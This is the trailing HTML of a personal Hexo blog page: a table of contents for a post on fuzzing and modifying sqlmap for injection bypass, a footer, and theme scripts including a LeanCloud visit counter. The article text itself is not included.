              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Fuzzing脚本编写"><span class="nav-number">2.</span> <span class="nav-text">Fuzzing脚本编写</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#修改sqlmap进行注入绕过"><span class="nav-number">3.</span> <span class="nav-text">修改sqlmap进行注入绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#方法一：修改发包函数："><span class="nav-number">3.1.</span> <span class="nav-text">方法一：修改发包函数：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#方法二：修改tamper脚本"><span class="nav-number">3.2.</span> <span class="nav-text">方法二：修改tamper脚本</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yokeen</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("jwmoWLlH6Y6Lhn3O89mgQzzU-gzGzoHsz", "d2eM2PNMsQCyGqPbC5aaIyuz");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  

  

</body>
</html>
